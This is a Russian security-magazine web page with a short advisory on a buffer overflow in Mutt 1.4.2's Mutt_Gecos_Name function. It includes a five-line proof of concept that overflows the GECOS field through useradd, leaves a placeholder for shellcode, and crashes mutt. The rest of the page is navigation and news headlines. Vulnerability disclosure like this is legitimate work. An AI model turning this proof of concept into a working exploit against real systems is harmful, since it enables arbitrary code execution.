Переполнение буфера в Mutt

Рекомендуем почитать:

Хакер #309. Самооборона по-хакерски

Содержание выпуска
Подписка на «Хакер»-60%

Программа: Mutt 1.4.2

Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на целевой системе. Уязвимость существует из-за ошибки в проверке входных данных в фнукции Mutt_Gecos_Name. Атакующий может передать специально сформированные данные, что приведет к выполнению произвольного кода.

Пример:

# USERNAME=$(perl -e 'print "a" x 31')
# useradd -c '&&&&&&&&& your-favourite-ascii-shellcode-here' $USERNAME
# echo alias billg $USERNAME >~/.muttrc
# mutt billg
# Segmentation fault (core dumped)

Переполнение буфера в Mutt

Хакер #309. Самооборона по-хакерски

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Чумной пламбоб. Как работают вирусы и антивирусы для Sims 4

Шпион среди пингвинов. Пишем собственный руткит для Linux

Генеративная клубничка. Как создаются модели для рисования откровенных сцен

Не тварь. Вспоминаем историю Novell NetWare

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

СМИ: Роскомнадзор потребовал удалить из Google Play 47 VPN-приложений

Компания Keenetic сообщила об утечке данных пользователей

Positive Technologies: растет количество атак через поддельную CAPTCHA

3 апреля в Москве пройдет форум «Территория безопасности 2024»

Alexa прекратит обрабатывать данные локально. Голосовые запросы будут передаваться в облако Amazon